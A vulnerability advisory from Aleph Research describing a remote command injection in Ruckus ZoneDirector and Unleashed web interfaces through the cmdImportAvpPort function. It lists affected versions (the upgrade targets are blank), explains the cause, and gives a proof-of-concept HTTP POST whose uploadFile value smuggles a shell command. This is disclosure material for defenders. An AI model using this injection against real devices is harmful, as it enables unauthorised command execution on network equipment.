Remote command injection via a crafted HTTP request (cmdImportAvpPort)

Aleph Research Advisory





  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7


  • 9.10.x: Upgrade to
  • 9.12.x: Upgrade to
  • 9.13.x: Upgrade to
  • 10.0.x: Upgrade to
  • 10.1.x: Upgrade to
  • 10.2.x: Upgrade to
  • 10.3.x: Upgrade to
  • 200.6 and before: Upgrade to
  • 200.7: Upgrade to

Technical Details

Remote command injection via a crafted HTTP request, caused by insufficient input validation

cmdImportAvpPort() function in emfd executable runs system() with insufficient input validation on fileUpload attribute. As a result a crafted POST request with attribute xcmd=import-avpport to the web interface page /admin/_cmdstat.jsp injects OS command.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Jail breaking Ruckus CLI using this exploit

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
X-CSRF-Token: oaMM8EBv1Y
Content-Length: 336
Cookie: -ejs-session-=x236a14bd195e0f136942005c785bac52

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'> 
	<xcmd cmd='import-avpport' uploadFile='; echo "inject" >/tmp/botox'  type='wlan-maxnums'/>




External References